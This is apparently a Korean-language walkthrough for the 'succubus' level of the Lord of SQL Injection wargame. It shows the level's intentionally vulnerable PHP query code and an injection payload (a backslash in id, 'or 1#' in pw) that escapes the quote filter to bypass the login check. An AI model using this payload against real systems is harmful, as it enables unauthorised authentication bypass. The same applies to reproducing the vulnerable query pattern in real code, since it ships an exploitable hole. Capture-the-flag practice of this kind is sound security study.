LORD OF SQL INJECTION [SUCCUBUS] 풀이

SUCCUBUS

 

문제소스 :

<?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/\'/',$_GET[id])) exit("HeHe");
  if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
  $query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("succubus"); 
  highlight_file(__FILE__); 
?>

 

싱글쿼트 ' 을 id와 pw에서 모두 필터링 한다.

 

id 값에 \을 입력해주면, $query에서 id='\' and pw='' 가 되는데

\' 은 string 싱글쿼트 ' 로 인식하게 된다.

 

 

 

 

 

pw 에 or 1%23을 입력해주어서 id를 true로 만들어버리자.

 

id = '\' and pw =' or 1#'